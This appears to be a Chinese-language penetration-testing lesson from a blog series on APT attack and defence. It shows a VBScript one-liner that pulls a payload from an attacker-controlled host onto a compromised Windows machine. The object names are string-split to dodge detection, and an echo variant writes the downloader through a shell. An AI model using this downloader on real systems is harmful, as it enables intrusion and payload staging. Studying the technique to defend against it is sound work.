第三十七課:vbs一句話下載payload
專注APT攻擊與防御
https://micropoor.blogspot.com/

一次msf完整的流程離不開目標(biāo)機(jī)的payload下載與執(zhí)行。而針對不同環(huán)境目標(biāo),考慮或者選擇不同方式的payload下載與執(zhí)行。如webshell下,注入點(diǎn)下。smb下等。而針對不同的實(shí)際環(huán)境,來做最好的選擇。既然本季開始專門針對windows下的payload下載講解,那么就需要考慮到目標(biāo)機(jī)的系
統(tǒng)版本,是windows2000,windows 2003,或者是更高的版本如windows 2016等。無論是哪個(gè)版本的windows系列,都是支持vbs的。

靶機(jī):windows 2003

vbs:
保存downfile.vbs
set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open
"get",wsh.arguments( 0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile
wsh.arguments(1),2
命令行下執(zhí)行:
1 cscript downfile.vbs http://192.168.1.115/robots.txt C:Inetpubb.txt
往往在實(shí)戰(zhàn)中,沒有上傳的方便條件,尤其是目標(biāo)機(jī)是windows,只有echo方式來寫入vbs。

命令行下執(zhí)行:

echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(
0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2
>>downfile.vbs

優(yōu)點(diǎn):支持windows全版本系列
缺點(diǎn):對https不友好

Micropoor
?